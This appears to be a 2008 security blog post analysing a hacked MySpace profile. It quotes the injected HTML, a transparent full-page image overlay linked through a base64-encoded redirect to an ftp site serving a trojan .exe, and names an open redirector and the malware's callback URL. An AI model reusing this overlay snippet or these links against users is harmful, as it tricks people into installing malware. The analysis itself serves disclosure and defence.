Menu:

Feed

RSS feed icon

Archives

Tags

MySpace hack

May 22, 2008

After hearing all kinds of stories about bad security at MySpace, I finally found a hacked profile. The profile, cyn7777, has now been cleaned up, so some parts of what follows will not work anymore.

The key of the attack were the following lines that were inserted in the profile's main page:

<a href="http://www.msplinks.com/MDFodHRwOi8vY29tLmNvbS9yZWRpcj9lZEl
kPTMmZGVzdFVybD1mdHA6Ly9taWNyb3NvZnBjZW50ZXI3MS5jbi9LQjg5MDgzMS5leG
U="><img
src="http://img341.imageshared.cn/.." style="position:absolute;
left:0px; top: 0px;" border="0"></a>

The code loaded an image similar to the following one and superimposed it to the page's contents. The actual image had 990x990 dimensions and transparent background, so, at first sight, the figure could be taken for a system's window: a classic picture-in-picture attack.

Screenshot of the fake removal tool window

Clicking anywhere on most of the page caused the browser to visit the base64-looking URL on msplinks.com. It turns out that back in April 2007 MySpace started to convert certain links to redirects through the msplinks.com site (check out the source of its index page :-)). The goal? "To easily turn off links to spam, phishing, or virus sites".

It looks like that didn't work too well... In fact, the link on msplinks.com (still) redirects to

(Incidentally, nice open redirector, cnet.com!)

The ftp site is still active and serves a bunch of exe files (all identical, except for their names). It seems the files have been changed in the last few days, probaby to evade detection from anti-virus tools. In any case, VirusTotal recognizes the old and the new version as some form of trojan/downloader. According to anubis, among other things, the binaries launch Internet Explorer and visit http://mycashloads.com/newuser.php?saff=373.0, which, however, redirects to yahoo.com.

Posted by marco in malware

To leave a comment, complete the form below. Mandatory fields are marked *.

Comment details